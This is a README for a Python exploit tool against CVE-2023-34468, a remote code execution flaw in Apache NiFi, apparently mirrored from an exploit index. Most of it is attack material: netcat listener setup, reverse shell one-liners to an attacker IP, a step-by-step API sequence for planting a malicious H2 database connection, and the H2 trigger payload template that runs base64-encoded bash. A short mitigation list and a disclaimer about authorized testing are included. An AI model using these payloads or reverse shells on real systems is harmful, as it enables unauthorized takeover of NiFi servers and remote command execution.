Share
## https://sploitus.com/exploit?id=DF0B883F-133D-5A63-AD0F-67B232C975A5
# CVE-2023-34468 Exploit

![GitHub stars](https://img.shields.io/github/stars/Jeanpt/CVE-2023-34468?style=social) ![GitHub license](https://img.shields.io/github/license/Jeanpt/CVE-2023-34468)

## Overview

This repository provides a Python-based exploit tool for **CVE-2023-34468**, a critical remote code execution vulnerability (CVSS 9.8) in Apache NiFi versions 0.0.2 through 1.21.0. It allows authenticated users to execute arbitrary code by manipulating H2 database connection strings with embedded triggers.

โš ๏ธ **Warning:** For educational and authorized testing purposes only. Unauthorized access to computer systems is illegal.

## Vulnerability Details

- **CVE ID:** CVE-2023-34468
- **Affected Versions:** Apache NiFi 0.0.2โ€“1.21.0
- **Impact:** Remote Code Execution (RCE)
- **CVSS Score:** 9.8 (Critical)
- **Discovery Date:** June 12, 2023
- **Description:** The DBCPConnectionPool and HikariCPConnectionPool Controller Services allow users to configure a Database URL with the H2 driver that enables arbitrary Java code execution through H2's CREATE TRIGGER functionality. When a connection is initialized, embedded JavaScript code executes with NiFi's privileges.

## Prerequisites

- Python 3.7+
- `requests` library
- Network access to NiFi API (default port 8080 or 8443)
- Target NiFi instance without authentication OR valid credentials
- Listener setup for reverse shell (e.g., `nc -lnvp 5555`)

## Quick Start

### Clone and Install

```bash
git clone https://github.com/Jeanpt/CVE-2023-34468.git
cd CVE-2023-34468
pip install -r requirements.txt
```

### Basic Usage

```bash
# Start your listener
nc -lnvp 5555

# Run the exploit
python3 exploit.py \
  -t http://nifi.target.com:8080 \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
  -lh ATTACKER_IP \
  -lp 5555
```

### Advanced Usage

```bash
python3 exploit.py --help
```

| Command | Description |
|---------|-------------|
| `-t, --target` | Target NiFi instance URL (required) |
| `-c, --command` | Command to execute (required) |
| `-lh, --lhost` | Listener host for callback (required) |
| `-lp, --lport` | Listener port for callback (required) |

**Verification:** Check your listener for the reverse shell connection. Run `id` to confirm code execution.

## How It Works (Technical Details)

### Attack Flow

1. **Reconnaissance:** Identify NiFi version via `/nifi-api/system-diagnostics`
2. **Create DBCP Service:** POST malicious H2 connection string to `/nifi-api/process-groups/root/controller-services`
3. **Create Processor:** POST ExecuteSQL processor to same process group
4. **Configure Processor:** Associate processor with malicious DBCP service
5. **Enable Service:** PUT to `/nifi-api/controller-services/{id}/run-status` with state `ENABLED`
6. **Trigger RCE:** PUT to `/nifi-api/processors/{id}/run-status` with state `RUNNING` โ€” H2 trigger fires on connection

### H2 Payload Structure

```
jdbc:h2:file:/tmp/{random_db}.db;TRACE_LEVEL_SYSTEM_OUT=0\;CREATE TRIGGER {random_name}
BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64_PAYLOAD}|{base64,-d}|{bash,-i}')
$$--=x
```

**Key points:**
- Escape semicolon with backslash: `\;`
- JavaScript fires on `BEFORE SELECT ON INFORMATION_SCHEMA.TABLES` (auto-triggered)
- Base64 encode payload to avoid special character issues
- Padding equals signs are replaced with spaces to avoid H2 parsing issues

## Payload Examples

### Reverse Shell

```bash
# Run exploit directly
python3 exploit.py -t http://target:8080 -c "bash -i >& /dev/tcp/10.10.16.46/5555 0>&1" -lh 10.10.16.46 -lp 5555
```

### Command Execution

```bash
python3 exploit.py -t http://target:8080 -c "touch /tmp/pwned" -lh 127.0.0.1 -lp 5555
```

## Mitigation

- **Update:** Upgrade to Apache NiFi 1.22.0 or later
- **Access Control:** Restrict NiFi API access via firewall/WAF
- **Authentication:** Enable and enforce authentication on NiFi
- **Monitoring:** Alert on unusual controller service configurations
- **Network Segmentation:** Isolate NiFi from untrusted networks

## References

- [NVD - CVE-2023-34468](https://nvd.nist.gov/vuln/detail/CVE-2023-34468)
- [Apache NiFi Security Advisory](https://nifi.apache.org/security.html#1.22.0)
- [NIFI-11653 - Issue Tracker](https://issues.apache.org/jira/browse/NIFI-11653)
- [Apache Mailing List Discussion](https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8)

## Disclaimer

This tool is provided for security research and authorized testing only. The author is not responsible for misuse or damage caused by this exploit. Always test responsibly in authorized environments only.

## Credits

- **Discovery:** Matei "Mal" Badanoiu
- **Metasploit Module:** h00die
- **Python POC:** Jean

## License

MIT License - See LICENSE file for details

---

**Built for security research and authorized penetration testing.**

Topics: `apache-nifi` `h2-database` `rce` `exploit` `cve-2023-34468` `python` `security-research`